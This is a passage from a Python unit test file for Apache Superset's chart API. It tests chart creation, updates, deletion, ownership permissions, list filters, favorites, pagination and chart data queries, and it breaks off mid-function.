# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
"""Unit tests for Superset"""
import json
from typing import List, Optional
from datetime import datetime
from io import BytesIO
from unittest import mock
from zipfile import is_zipfile, ZipFile
import humanize
import prison
import pytest
import yaml
from sqlalchemy import and_
from sqlalchemy.sql import func
from tests.test_app import app
from superset.charts.commands.data import ChartDataCommand
from superset.connectors.connector_registry import ConnectorRegistry
from superset.connectors.sqla.models import SqlaTable
from superset.extensions import async_query_manager, cache_manager, db, security_manager
from superset.models.annotations import AnnotationLayer
from superset.models.core import Database, FavStar, FavStarClassName
from superset.models.dashboard import Dashboard
from superset.models.reports import ReportSchedule, ReportScheduleType
from superset.models.slice import Slice
from superset.utils import core as utils
from superset.utils.core import AnnotationType, get_example_database
from tests.base_api_tests import ApiOwnersTestCaseMixin
from tests.base_tests import SupersetTestCase, post_assert_metric, test_client
from tests.fixtures.importexport import (
chart_config,
chart_metadata_config,
database_config,
dataset_config,
dataset_metadata_config,
)
from tests.fixtures.energy_dashboard import load_energy_table_with_slice
from tests.fixtures.query_context import get_query_context, ANNOTATION_LAYERS
from tests.fixtures.unicode_dashboard import load_unicode_dashboard_with_slice
from tests.annotation_layers.fixtures import create_annotation_layers
CHART_DATA_URI = "api/v1/chart/data"
CHARTS_FIXTURE_COUNT = 10
class TestChartApi(SupersetTestCase, ApiOwnersTestCaseMixin):
resource_name = "chart"
def insert_chart(
self,
slice_name: str,
owners: List[int],
datasource_id: int,
created_by=None,
datasource_type: str = "table",
description: Optional[str] = None,
viz_type: Optional[str] = None,
params: Optional[str] = None,
cache_timeout: Optional[int] = None,
) -> Slice:
obj_owners = list()
for owner in owners:
user = db.session.query(security_manager.user_model).get(owner)
obj_owners.append(user)
datasource = ConnectorRegistry.get_datasource(
datasource_type, datasource_id, db.session
)
slice = Slice(
cache_timeout=cache_timeout,
created_by=created_by,
datasource_id=datasource.id,
datasource_name=datasource.name,
datasource_type=datasource.type,
description=description,
owners=obj_owners,
params=params,
slice_name=slice_name,
viz_type=viz_type,
)
db.session.add(slice)
db.session.commit()
return slice
@pytest.fixture(autouse=True)
def clear_data_cache(self):
with app.app_context():
cache_manager.data_cache.clear()
yield
@pytest.fixture()
def create_charts(self):
with self.create_app().app_context():
charts = []
admin = self.get_user("admin")
for cx in range(CHARTS_FIXTURE_COUNT - 1):
charts.append(self.insert_chart(f"name{cx}", [admin.id], 1))
fav_charts = []
for cx in range(round(CHARTS_FIXTURE_COUNT / 2)):
fav_star = FavStar(
user_id=admin.id, class_name="slice", obj_id=charts[cx].id
)
db.session.add(fav_star)
db.session.commit()
fav_charts.append(fav_star)
yield charts
# rollback changes
for chart in charts:
db.session.delete(chart)
for fav_chart in fav_charts:
db.session.delete(fav_chart)
db.session.commit()
@pytest.fixture()
def create_chart_with_report(self):
with self.create_app().app_context():
admin = self.get_user("admin")
chart = self.insert_chart(f"chart_report", [admin.id], 1)
report_schedule = ReportSchedule(
type=ReportScheduleType.REPORT,
name="report_with_chart",
crontab="* * * * *",
chart=chart,
)
db.session.commit()
yield chart
# rollback changes
db.session.delete(report_schedule)
db.session.delete(chart)
db.session.commit()
@pytest.fixture()
def add_dashboard_to_chart(self):
with self.create_app().app_context():
admin = self.get_user("admin")
self.chart = self.insert_chart("My chart", [admin.id], 1)
self.original_dashboard = Dashboard()
self.original_dashboard.dashboard_title = "Original Dashboard"
self.original_dashboard.slug = "slug"
self.original_dashboard.owners = [admin]
self.original_dashboard.slices = [self.chart]
self.original_dashboard.published = False
db.session.add(self.original_dashboard)
self.new_dashboard = Dashboard()
self.new_dashboard.dashboard_title = "New Dashboard"
self.new_dashboard.slug = "new_slug"
self.new_dashboard.owners = [admin]
self.new_dashboard.slices = []
self.new_dashboard.published = False
db.session.add(self.new_dashboard)
db.session.commit()
yield self.chart
db.session.delete(self.original_dashboard)
db.session.delete(self.new_dashboard)
db.session.delete(self.chart)
db.session.commit()
def test_info_security_chart(self):
"""
Chart API: Test info security
"""
self.login(username="admin")
params = {"keys": ["permissions"]}
uri = f"api/v1/chart/_info?q={prison.dumps(params)}"
rv = self.get_assert_metric(uri, "info")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert "can_read" in data["permissions"]
assert "can_write" in data["permissions"]
assert len(data["permissions"]) == 2
def create_chart_import(self):
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("chart_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(chart_metadata_config).encode())
with bundle.open(
"chart_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open("chart_export/datasets/imported_dataset.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
with bundle.open("chart_export/charts/imported_chart.yaml", "w") as fp:
fp.write(yaml.safe_dump(chart_config).encode())
buf.seek(0)
return buf
def test_delete_chart(self):
"""
Chart API: Test delete
"""
admin_id = self.get_user("admin").id
chart_id = self.insert_chart("name", [admin_id], 1).id
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_bulk_charts(self):
"""
Chart API: Test delete bulk
"""
admin = self.get_user("admin")
chart_count = 4
chart_ids = list()
for chart_name_index in range(chart_count):
chart_ids.append(
self.insert_chart(f"title{chart_name_index}", [admin.id], 1, admin).id
)
self.login(username="admin")
argument = chart_ids
uri = f"api/v1/chart/?q={prison.dumps(argument)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 200)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": f"Deleted {chart_count} charts"}
self.assertEqual(response, expected_response)
for chart_id in chart_ids:
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_bulk_chart_bad_request(self):
"""
Chart API: Test delete bulk bad request
"""
chart_ids = [1, "a"]
self.login(username="admin")
argument = chart_ids
uri = f"api/v1/chart/?q={prison.dumps(argument)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 400)
def test_delete_not_found_chart(self):
"""
Chart API: Test not found delete
"""
self.login(username="admin")
chart_id = 1000
uri = f"api/v1/chart/{chart_id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 404)
@pytest.mark.usefixtures("create_chart_with_report")
def test_delete_chart_with_report(self):
"""
Chart API: Test delete with associated report
"""
self.login(username="admin")
chart = (
db.session.query(Slice)
.filter(Slice.slice_name == "chart_report")
.one_or_none()
)
uri = f"api/v1/chart/{chart.id}"
rv = self.client.delete(uri)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 422)
expected_response = {
"message": "There are associated alerts or reports: report_with_chart"
}
self.assertEqual(response, expected_response)
def test_delete_bulk_charts_not_found(self):
"""
Chart API: Test delete bulk not found
"""
max_id = db.session.query(func.max(Slice.id)).scalar()
chart_ids = [max_id + 1, max_id + 2]
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(chart_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 404)
@pytest.mark.usefixtures("create_chart_with_report", "create_charts")
def test_bulk_delete_chart_with_report(self):
"""
Chart API: Test bulk delete with associated report
"""
self.login(username="admin")
chart_with_report = (
db.session.query(Slice.id)
.filter(Slice.slice_name == "chart_report")
.one_or_none()
)
charts = db.session.query(Slice.id).filter(Slice.slice_name.like("name%")).all()
chart_ids = [chart.id for chart in charts]
chart_ids.append(chart_with_report.id)
uri = f"api/v1/chart/?q={prison.dumps(chart_ids)}"
rv = self.client.delete(uri)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 422)
expected_response = {
"message": "There are associated alerts or reports: report_with_chart"
}
self.assertEqual(response, expected_response)
def test_delete_chart_admin_not_owned(self):
"""
Chart API: Test admin delete not owned
"""
gamma_id = self.get_user("gamma").id
chart_id = self.insert_chart("title", [gamma_id], 1).id
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_bulk_chart_admin_not_owned(self):
"""
Chart API: Test admin delete bulk not owned
"""
gamma_id = self.get_user("gamma").id
chart_count = 4
chart_ids = list()
for chart_name_index in range(chart_count):
chart_ids.append(
self.insert_chart(f"title{chart_name_index}", [gamma_id], 1).id
)
self.login(username="admin")
argument = chart_ids
uri = f"api/v1/chart/?q={prison.dumps(argument)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 200)
expected_response = {"message": f"Deleted {chart_count} charts"}
self.assertEqual(response, expected_response)
for chart_id in chart_ids:
model = db.session.query(Slice).get(chart_id)
self.assertEqual(model, None)
def test_delete_chart_not_owned(self):
"""
Chart API: Test delete try not owned
"""
user_alpha1 = self.create_user(
"alpha1", "password", "Alpha", email="[email protected]"
)
user_alpha2 = self.create_user(
"alpha2", "password", "Alpha", email="[email protected]"
)
chart = self.insert_chart("title", [user_alpha1.id], 1)
self.login(username="alpha2", password="password")
uri = f"api/v1/chart/{chart.id}"
rv = self.delete_assert_metric(uri, "delete")
self.assertEqual(rv.status_code, 403)
db.session.delete(chart)
db.session.delete(user_alpha1)
db.session.delete(user_alpha2)
db.session.commit()
def test_delete_bulk_chart_not_owned(self):
"""
Chart API: Test delete bulk try not owned
"""
user_alpha1 = self.create_user(
"alpha1", "password", "Alpha", email="[email protected]"
)
user_alpha2 = self.create_user(
"alpha2", "password", "Alpha", email="[email protected]"
)
chart_count = 4
charts = list()
for chart_name_index in range(chart_count):
charts.append(
self.insert_chart(f"title{chart_name_index}", [user_alpha1.id], 1)
)
owned_chart = self.insert_chart("title_owned", [user_alpha2.id], 1)
self.login(username="alpha2", password="password")
# verify we can't delete not owned charts
arguments = [chart.id for chart in charts]
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 403)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": "Forbidden"}
self.assertEqual(response, expected_response)
# # nothing is deleted in bulk with a list of owned and not owned charts
arguments = [chart.id for chart in charts] + [owned_chart.id]
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
self.assertEqual(rv.status_code, 403)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": "Forbidden"}
self.assertEqual(response, expected_response)
for chart in charts:
db.session.delete(chart)
db.session.delete(owned_chart)
db.session.delete(user_alpha1)
db.session.delete(user_alpha2)
db.session.commit()
def test_create_chart(self):
"""
Chart API: Test create chart
"""
admin_id = self.get_user("admin").id
chart_data = {
"slice_name": "name1",
"description": "description1",
"owners": [admin_id],
"viz_type": "viz_type1",
"params": "1234",
"cache_timeout": 1000,
"datasource_id": 1,
"datasource_type": "table",
"dashboards": [1, 2],
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 201)
data = json.loads(rv.data.decode("utf-8"))
model = db.session.query(Slice).get(data.get("id"))
db.session.delete(model)
db.session.commit()
def test_create_simple_chart(self):
"""
Chart API: Test create simple chart
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 201)
data = json.loads(rv.data.decode("utf-8"))
model = db.session.query(Slice).get(data.get("id"))
db.session.delete(model)
db.session.commit()
def test_create_chart_validate_owners(self):
"""
Chart API: Test create validate owners
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
"owners": [1000],
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": {"owners": ["Owners are invalid"]}}
self.assertEqual(response, expected_response)
def test_create_chart_validate_params(self):
"""
Chart API: Test create validate params json
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
"params": '{"A:"a"}',
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 400)
def test_create_chart_validate_datasource(self):
"""
Chart API: Test create validate datasource
"""
self.login(username="admin")
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "unknown",
}
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 400)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response,
{"message": {"datasource_type": ["Must be one of: druid, table, view."]}},
)
chart_data = {
"slice_name": "title1",
"datasource_id": 0,
"datasource_type": "table",
}
uri = f"api/v1/chart/"
rv = self.post_assert_metric(uri, chart_data, "post")
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response, {"message": {"datasource_id": ["Datasource does not exist"]}}
)
def test_update_chart(self):
"""
Chart API: Test update
"""
admin = self.get_user("admin")
gamma = self.get_user("gamma")
chart_id = self.insert_chart("title", [admin.id], 1, admin).id
birth_names_table_id = SupersetTestCase.get_table_by_name("birth_names").id
chart_data = {
"slice_name": "title1_changed",
"description": "description1",
"owners": [gamma.id],
"viz_type": "viz_type1",
"params": """{"a": 1}""",
"cache_timeout": 1000,
"datasource_id": birth_names_table_id,
"datasource_type": "table",
"dashboards": [1],
}
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
related_dashboard = db.session.query(Dashboard).get(1)
self.assertEqual(model.created_by, admin)
self.assertEqual(model.slice_name, "title1_changed")
self.assertEqual(model.description, "description1")
self.assertIn(admin, model.owners)
self.assertIn(gamma, model.owners)
self.assertEqual(model.viz_type, "viz_type1")
self.assertEqual(model.params, """{"a": 1}""")
self.assertEqual(model.cache_timeout, 1000)
self.assertEqual(model.datasource_id, birth_names_table_id)
self.assertEqual(model.datasource_type, "table")
self.assertEqual(model.datasource_name, "birth_names")
self.assertIn(related_dashboard, model.dashboards)
db.session.delete(model)
db.session.commit()
def test_update_chart_new_owner(self):
"""
Chart API: Test update set new owner to current user
"""
gamma = self.get_user("gamma")
admin = self.get_user("admin")
chart_id = self.insert_chart("title", [gamma.id], 1).id
chart_data = {"slice_name": "title1_changed"}
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
model = db.session.query(Slice).get(chart_id)
self.assertIn(admin, model.owners)
db.session.delete(model)
db.session.commit()
@pytest.mark.usefixtures("add_dashboard_to_chart")
def test_update_chart_new_dashboards(self):
"""
Chart API: Test update set new owner to current user
"""
chart_data = {
"slice_name": "title1_changed",
"dashboards": [self.new_dashboard.id],
}
self.login(username="admin")
uri = f"api/v1/chart/{self.chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
self.assertIn(self.new_dashboard, self.chart.dashboards)
self.assertNotIn(self.original_dashboard, self.chart.dashboards)
@pytest.mark.usefixtures("add_dashboard_to_chart")
def test_not_update_chart_none_dashboards(self):
"""
Chart API: Test update set new owner to current user
"""
chart_data = {"slice_name": "title1_changed_again"}
self.login(username="admin")
uri = f"api/v1/chart/{self.chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 200)
self.assertIn(self.original_dashboard, self.chart.dashboards)
self.assertEqual(len(self.chart.dashboards), 1)
def test_update_chart_not_owned(self):
"""
Chart API: Test update not owned
"""
user_alpha1 = self.create_user(
"alpha1", "password", "Alpha", email="[email protected]"
)
user_alpha2 = self.create_user(
"alpha2", "password", "Alpha", email="[email protected]"
)
chart = self.insert_chart("title", [user_alpha1.id], 1)
self.login(username="alpha2", password="password")
chart_data = {"slice_name": "title1_changed"}
uri = f"api/v1/chart/{chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 403)
db.session.delete(chart)
db.session.delete(user_alpha1)
db.session.delete(user_alpha2)
db.session.commit()
def test_update_chart_validate_datasource(self):
"""
Chart API: Test update validate datasource
"""
admin = self.get_user("admin")
chart = self.insert_chart("title", [admin.id], 1)
self.login(username="admin")
chart_data = {"datasource_id": 1, "datasource_type": "unknown"}
uri = f"api/v1/chart/{chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 400)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response,
{"message": {"datasource_type": ["Must be one of: druid, table, view."]}},
)
chart_data = {"datasource_id": 0, "datasource_type": "table"}
uri = f"api/v1/chart/{chart.id}"
rv = self.put_assert_metric(uri, chart_data, "put")
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
response, {"message": {"datasource_id": ["Datasource does not exist"]}}
)
db.session.delete(chart)
db.session.commit()
def test_update_chart_validate_owners(self):
"""
Chart API: Test update validate owners
"""
chart_data = {
"slice_name": "title1",
"datasource_id": 1,
"datasource_type": "table",
"owners": [1000],
}
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.client.post(uri, json=chart_data)
self.assertEqual(rv.status_code, 422)
response = json.loads(rv.data.decode("utf-8"))
expected_response = {"message": {"owners": ["Owners are invalid"]}}
self.assertEqual(response, expected_response)
def test_get_chart(self):
"""
Chart API: Test get chart
"""
admin = self.get_user("admin")
chart = self.insert_chart("title", [admin.id], 1)
self.login(username="admin")
uri = f"api/v1/chart/{chart.id}"
rv = self.get_assert_metric(uri, "get")
self.assertEqual(rv.status_code, 200)
expected_result = {
"cache_timeout": None,
"dashboards": [],
"description": None,
"owners": [
{
"id": 1,
"username": "admin",
"first_name": "admin",
"last_name": "user",
}
],
"params": None,
"slice_name": "title",
"viz_type": None,
}
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["result"], expected_result)
db.session.delete(chart)
db.session.commit()
def test_get_chart_not_found(self):
"""
Chart API: Test get chart not found
"""
chart_id = 1000
self.login(username="admin")
uri = f"api/v1/chart/{chart_id}"
rv = self.get_assert_metric(uri, "get")
self.assertEqual(rv.status_code, 404)
def test_get_chart_no_data_access(self):
"""
Chart API: Test get chart without data access
"""
self.login(username="gamma")
chart_no_access = (
db.session.query(Slice)
.filter_by(slice_name="Girl Name Cloud")
.one_or_none()
)
uri = f"api/v1/chart/{chart_no_access.id}"
rv = self.client.get(uri)
self.assertEqual(rv.status_code, 404)
@pytest.mark.usefixtures("load_unicode_dashboard_with_slice")
@pytest.mark.usefixtures("load_energy_table_with_slice")
def test_get_charts(self):
"""
Chart API: Test get charts
"""
self.login(username="admin")
uri = f"api/v1/chart/"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 33)
def test_get_charts_changed_on(self):
"""
Dashboard API: Test get charts changed on
"""
admin = self.get_user("admin")
start_changed_on = datetime.now()
chart = self.insert_chart("foo_a", [admin.id], 1, description="ZY_bar")
self.login(username="admin")
arguments = {
"order_column": "changed_on_delta_humanized",
"order_direction": "desc",
}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
data["result"][0]["changed_on_delta_humanized"],
humanize.naturaltime(datetime.now() - start_changed_on),
)
# rollback changes
db.session.delete(chart)
db.session.commit()
def test_get_charts_filter(self):
"""
Chart API: Test get charts filter
"""
self.login(username="admin")
arguments = {"filters": [{"col": "slice_name", "opr": "sw", "value": "G"}]}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 5)
@pytest.fixture()
def load_energy_charts(self):
with app.app_context():
admin = self.get_user("admin")
energy_table = (
db.session.query(SqlaTable)
.filter_by(table_name="energy_usage")
.one_or_none()
)
energy_table_id = 1
if energy_table:
energy_table_id = energy_table.id
chart1 = self.insert_chart(
"foo_a", [admin.id], energy_table_id, description="ZY_bar"
)
chart2 = self.insert_chart(
"zy_foo", [admin.id], energy_table_id, description="desc1"
)
chart3 = self.insert_chart(
"foo_b", [admin.id], energy_table_id, description="desc1zy_"
)
chart4 = self.insert_chart(
"foo_c", [admin.id], energy_table_id, viz_type="viz_zy_"
)
chart5 = self.insert_chart(
"bar", [admin.id], energy_table_id, description="foo"
)
yield
# rollback changes
db.session.delete(chart1)
db.session.delete(chart2)
db.session.delete(chart3)
db.session.delete(chart4)
db.session.delete(chart5)
db.session.commit()
@pytest.mark.usefixtures("load_energy_charts")
def test_get_charts_custom_filter(self):
"""
Chart API: Test get charts custom filter
"""
arguments = {
"filters": [{"col": "slice_name", "opr": "chart_all_text", "value": "zy_"}],
"order_column": "slice_name",
"order_direction": "asc",
"keys": ["none"],
"columns": ["slice_name", "description", "viz_type"],
}
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 4)
expected_response = [
{"description": "ZY_bar", "slice_name": "foo_a", "viz_type": None},
{"description": "desc1zy_", "slice_name": "foo_b", "viz_type": None},
{"description": None, "slice_name": "foo_c", "viz_type": "viz_zy_"},
{"description": "desc1", "slice_name": "zy_foo", "viz_type": None},
]
for index, item in enumerate(data["result"]):
self.assertEqual(
item["description"], expected_response[index]["description"]
)
self.assertEqual(item["slice_name"], expected_response[index]["slice_name"])
self.assertEqual(item["viz_type"], expected_response[index]["viz_type"])
@pytest.mark.usefixtures("load_energy_table_with_slice", "load_energy_charts")
def test_admin_gets_filtered_energy_slices(self):
# test filtering on datasource_name
arguments = {
"filters": [
{"col": "slice_name", "opr": "chart_all_text", "value": "energy",}
],
"keys": ["none"],
"columns": ["slice_name"],
}
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 8)
@pytest.mark.usefixtures("load_energy_charts")
def test_user_gets_none_filtered_energy_slices(self):
# test filtering on datasource_name
arguments = {
"filters": [
{"col": "slice_name", "opr": "chart_all_text", "value": "energy",}
],
"keys": ["none"],
"columns": ["slice_name"],
}
self.login(username="gamma")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 0)
@pytest.mark.usefixtures("create_charts")
def test_get_charts_favorite_filter(self):
"""
Chart API: Test get charts favorite filter
"""
admin = self.get_user("admin")
users_favorite_query = db.session.query(FavStar.obj_id).filter(
and_(FavStar.user_id == admin.id, FavStar.class_name == "slice")
)
expected_models = (
db.session.query(Slice)
.filter(and_(Slice.id.in_(users_favorite_query)))
.order_by(Slice.slice_name.asc())
.all()
)
arguments = {
"filters": [{"col": "id", "opr": "chart_is_favorite", "value": True}],
"order_column": "slice_name",
"order_direction": "asc",
"keys": ["none"],
"columns": ["slice_name"],
}
self.login(username="admin")
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert len(expected_models) == data["count"]
for i, expected_model in enumerate(expected_models):
assert expected_model.slice_name == data["result"][i]["slice_name"]
# Test not favorite charts
expected_models = (
db.session.query(Slice)
.filter(and_(~Slice.id.in_(users_favorite_query)))
.order_by(Slice.slice_name.asc())
.all()
)
arguments["filters"][0]["value"] = False
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert len(expected_models) == data["count"]
@pytest.mark.usefixtures("create_charts")
def test_get_current_user_favorite_status(self):
"""
Dataset API: Test get current user favorite stars
"""
admin = self.get_user("admin")
users_favorite_ids = [
star.obj_id
for star in db.session.query(FavStar.obj_id)
.filter(
and_(
FavStar.user_id == admin.id,
FavStar.class_name == FavStarClassName.CHART,
)
)
.all()
]
assert users_favorite_ids
arguments = [s.id for s in db.session.query(Slice.id).all()]
self.login(username="admin")
uri = f"api/v1/chart/favorite_status/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
for res in data["result"]:
if res["id"] in users_favorite_ids:
assert res["value"]
def test_get_time_range(self):
"""
Chart API: Test get actually time range from human readable string
"""
self.login(username="admin")
humanize_time_range = "100 years ago : now"
uri = f"api/v1/time_range/?q={prison.dumps(humanize_time_range)}"
rv = self.client.get(uri)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 200)
self.assertEqual(len(data["result"]), 3)
@pytest.mark.usefixtures(
"load_unicode_dashboard_with_slice", "load_energy_table_with_slice"
)
def test_get_charts_page(self):
"""
Chart API: Test get charts filter
"""
# Assuming we have 33 sample charts
self.login(username="admin")
arguments = {"page_size": 10, "page": 0}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(len(data["result"]), 10)
arguments = {"page_size": 10, "page": 3}
uri = f"api/v1/chart/?q={prison.dumps(arguments)}"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(len(data["result"]), 3)
def test_get_charts_no_data_access(self):
"""
Chart API: Test get charts no data access
"""
self.login(username="gamma")
uri = f"api/v1/chart/"
rv = self.get_assert_metric(uri, "get_list")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["count"], 0)
def test_chart_data_simple(self):
"""
Chart data API: Test chart data query
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["result"][0]["rowcount"], 45)
def test_chart_data_applied_time_extras(self):
"""
Chart data API: Test chart data query with applied time extras
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["applied_time_extras"] = {
"__time_range": "100 years ago : now",
"__time_origin": "now",
}
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
data["result"][0]["applied_filters"],
[{"column": "gender"}, {"column": "__time_range"},],
)
self.assertEqual(
data["result"][0]["rejected_filters"],
[{"column": "__time_origin", "reason": "not_druid_datasource"},],
)
self.assertEqual(data["result"][0]["rowcount"], 45)
def test_chart_data_limit_offset(self):
"""
Chart data API: Test chart data query with limit and offset
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["row_limit"] = 5
request_payload["queries"][0]["row_offset"] = 0
request_payload["queries"][0]["orderby"] = [["name", True]]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 5)
# TODO: fix offset for presto DB
if get_example_database().backend == "presto":
return
# ensure that offset works properly
offset = 2
expected_name = result["data"][offset]["name"]
request_payload["queries"][0]["row_offset"] = offset
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 5)
self.assertEqual(result["data"][0]["name"], expected_name)
@mock.patch(
"superset.common.query_object.config", {**app.config, "ROW_LIMIT": 7},
)
def test_chart_data_default_row_limit(self):
"""
Chart data API: Ensure row count doesn't exceed default limit
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
del request_payload["queries"][0]["row_limit"]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 7)
@mock.patch(
"superset.common.query_context.config", {**app.config, "SAMPLES_ROW_LIMIT": 5},
)
def test_chart_data_default_sample_limit(self):
"""
Chart data API: Ensure sample response row count doesn't exceed default limit
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = utils.ChartDataResultType.SAMPLES
request_payload["queries"][0]["row_limit"] = 10
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 5)
def test_chart_data_incorrect_result_type(self):
"""
Chart data API: Test chart data with unsupported result type
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = "qwerty"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_incorrect_result_format(self):
"""
